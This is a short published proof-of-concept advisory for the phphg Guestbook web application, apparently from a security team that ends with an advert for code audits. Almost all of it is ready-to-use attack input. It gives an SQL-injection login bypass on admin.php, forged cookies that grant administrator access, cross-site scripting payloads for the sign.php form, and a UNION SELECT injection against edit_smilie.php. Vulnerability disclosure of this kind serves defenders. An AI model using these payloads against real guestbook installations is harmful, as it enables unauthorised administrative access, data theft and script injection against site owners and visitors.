PoC/Exploit for Multiple Vulnerabilities in phphg Guestbook

Published Proof of Concept code - Multiple Vulnerabilities in phphg Guestbook.

Description
Available
Solution
Available

1. Authentication Bypass

a) SQL Injection
url: http://host/hg/admin.php
Username: ' or 1/*
Password: any

b) Cookie based authentication
Cookie: loged=yes
Cookie: username=admin
Cookie: user_level=1


2. Cross-Site Scripting Example.
Url: http://host/hg/sign.php
Location: <XSS>
Website: javascript:alert(123)
Message: <XSS>


3. SQL Injection Example:
http://host/hg/admin/edit_smilie.php?id=333'%20union%20select%201,2,3,4/*

Order Source Code Analysis made by eVuln team

Prevent hacking by source code audit of your site or web application done by eVuln team.The work will be done by experts in web application security.

Advisories by vuln type